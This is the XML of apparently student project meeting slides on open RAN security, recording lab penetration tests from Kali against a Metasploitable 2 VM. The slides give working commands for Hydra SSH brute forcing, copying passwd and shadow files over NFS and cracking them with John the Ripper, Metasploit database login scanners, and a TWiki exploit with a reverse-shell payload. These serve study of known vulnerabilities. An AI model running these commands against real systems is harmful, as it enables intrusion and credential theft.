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312" r:id="rId4"/>
    <p:sldId id="309" r:id="rId5"/>
    <p:sldId id="327" r:id="rId6"/>
    <p:sldId id="328" r:id="rId7"/>
    <p:sldId id="329" r:id="rId8"/>
    <p:sldId id="330" r:id="rId9"/>
    <p:sldId id="331" r:id="rId10"/>
    <p:sldId id="303" r:id="rId11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04.12.2022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04.12.2022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59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43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72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7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14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3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6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2022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LRQsFTmWa2w&amp;list=PLJn2bvT5CNzZl2Fk7jIQsTd48KgaxmWqs&amp;index=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meeting-07 (01.12.2022)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/>
              <a:t>Next Steps (Week 8) (Until 08.12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.2022)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03D67-A8ED-3772-B322-314CF6E532BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692207" y="1581818"/>
            <a:ext cx="7759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Select one to use it at the end of the project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the docker container?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OS (Ubuntu 18)?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How to attack open RAN components or interfaces?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What are the components and interfaces of open RAN?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Search for the known vulnerabilities in CVE list/NIST/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>exploitdB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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Previous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" b="1" dirty="0"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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Weeks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" b="1" dirty="0"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3330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5 Meeting (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>17.11.2022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400" dirty="0"/>
              <a:t>Install Infection monkey (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Need AWS subscription, don’t continue anymore!!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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4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28" y="1366728"/>
            <a:ext cx="3097036" cy="432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016" y="1736958"/>
            <a:ext cx="3706223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738461"/>
            <a:ext cx="809148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0289-0BB8-F9AE-B1DE-785BF5D7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30" y="1352000"/>
            <a:ext cx="4586552" cy="351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9217C-CEB2-0B85-26A9-EE59134B3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62" y="590422"/>
            <a:ext cx="7816431" cy="8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2885170" y="368247"/>
            <a:ext cx="3112378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Password (1)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402850" y="2030959"/>
            <a:ext cx="75639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Weak Password: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Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> 2 has terrible password security for both system and database server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Hydra is a popular tool for launching brute force attacks on login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Hydra is installed by default on Kali and Hydra is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>online</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> password-cracking 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John the Ripper jumbo - advanced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>offline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs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Command (to crack the password of the user sys of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> VM using the password list provided in Moodle):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hydra -l sys -P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>/share/john/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>password.lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> 10.0.2.7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a: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With Hydra, the password for user sys of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> is cracked as “batman”.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Command (to get the passwd and shadow file from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> using NFS mount and create a combined file containing password hashes):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cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/r00t/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/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cp passwd /home/kali/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cp shadow /home/kali/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cd home/kali/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unshadow passwd shadow &gt; unshadow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cat unshadow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E1E83-C548-FBBB-74DF-7CCBD91FD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942" y="819421"/>
            <a:ext cx="669117" cy="420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2FD3F-CBDB-B16E-2D95-DB4F2A427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7347130" y="658497"/>
            <a:ext cx="695864" cy="4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2885170" y="368247"/>
            <a:ext cx="3112378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Password (2)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402850" y="2030959"/>
            <a:ext cx="7563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Command (run john to crack as many passwords as possible):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john --wordlist=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/share/john/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>password.lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> unshadow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Cracked 3 passwords-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Command (to run john to crack as many as passwords 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john unshadow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john –show unshadow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Cracked 3 passwords-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6 out of 7 passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>were cracked using John the Ripper.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E1E83-C548-FBBB-74DF-7CCBD91FD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942" y="819421"/>
            <a:ext cx="669117" cy="420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2FD3F-CBDB-B16E-2D95-DB4F2A427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7347130" y="658497"/>
            <a:ext cx="695864" cy="429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916584-498C-5280-8E5D-F153E0580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3519" y="2515858"/>
            <a:ext cx="2725954" cy="665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1E5C82-9606-3D3E-DA66-23AC216BF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9154" y="3640959"/>
            <a:ext cx="2380319" cy="7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2697878" y="353239"/>
            <a:ext cx="383480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 against Database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402850" y="2030959"/>
            <a:ext cx="75639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Attack against Postgres and MySQL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Command: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msfconsole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use auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>mysql_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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set RHOSTS 10.0.2.7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use auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>postgres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>postgres_login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set RHOSTS 10.0.2.7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creds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Observation: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PostgreSQL service can be accessed with username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>postgres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> and password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>postgres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While the MySQL service is open to username root with an empty password.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E1E83-C548-FBBB-74DF-7CCBD91FD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942" y="819421"/>
            <a:ext cx="669117" cy="420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2FD3F-CBDB-B16E-2D95-DB4F2A427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7347130" y="658497"/>
            <a:ext cx="695864" cy="429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1ACE37-C70C-2A0C-BBB9-71E2BC43B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09" y="5141313"/>
            <a:ext cx="6942858" cy="10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2697878" y="370048"/>
            <a:ext cx="3834807" cy="67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Vulnerable Web Services</a:t>
            </a:r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phic 3" descr="Television with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCE1B43A-E4E2-9B08-DCD8-97B466DD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301" y="616788"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Graphic 5" descr="Television with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40E9A9E-4F7F-8B5A-FD28-5ED82BF7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7863" y="45719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1073A7-2E92-9D28-1439-D70931E8C6A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220637" y="836762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A26E5-671E-1582-98D6-AAD09ABB0EBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7380198" y="684498"/>
            <a:ext cx="629729" cy="31917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7E70-1C87-A674-E71A-79DF5F76ED18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900507" y="1375914"/>
            <a:ext cx="136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Kali Linux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10.0.2.15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FB14B-F13C-9A6C-84D2-71ADCCEEE2D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6890018" y="1239600"/>
            <a:ext cx="235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Metasploitable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 VM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IP: 10.0.2.7</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="1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183C0-9307-EF19-8419-60A0EAF42824}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402850" y="2030959"/>
            <a:ext cx="75639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Vulnerable Web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Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> 2 has deliberately vulnerable web applications pre-installed.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TWiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> web application is vulnerable to remote code execution.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Command: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msfconsole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use exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>/webapp/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>twiki_history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set RHOSTS 10.0.2.7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set PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>/reverse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use exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>/webapp/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>twiki_history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sessions –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>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</a:rPr>
              <a:t>Observation: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user on the target machine is www-data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="16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E1E83-C548-FBBB-74DF-7CCBD91FD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942" y="819421"/>
            <a:ext cx="669117" cy="420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2FD3F-CBDB-B16E-2D95-DB4F2A427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V="1">
            <a:off x="7347130" y="658497"/>
            <a:ext cx="695864" cy="429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F0D546-4933-FE0C-E05C-B2B1DDAB07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037" y="5316388"/>
            <a:ext cx="4486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160466" y="6417057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672861" y="728931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in the Meeting</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="36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D2D97-CC4D-8D7F-3D80-E5E8C3748F39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="876083" y="1880558"/>
            <a:ext cx="78414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Tryhackme.com is a good website to learn more about hacking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Important attack- Kernel exploit (old OS Ubuntu)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provider may have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>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oll-based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> access (research)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Known attack database </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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CVE list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exploitdB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000" dirty="0"/>
              <a:t>IT Forensic: Whether we can find some logs about the location of the infected device so that we can terminate it etc.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video-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https://www.youtube.com/watch?v=LRQsFTmWa2w&amp;list=PLJn2bvT5CNzZl2Fk7jIQsTd48KgaxmWqs&amp;index=11</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="2000" u="sng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2112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887</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)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86</cp:revision>
  <cp:lastPrinted>2018-03-07T15:14:31Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-10-18T12:05:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-04T11:23:20Z</dcterms:modified>
</cp:coreProperties>
</file>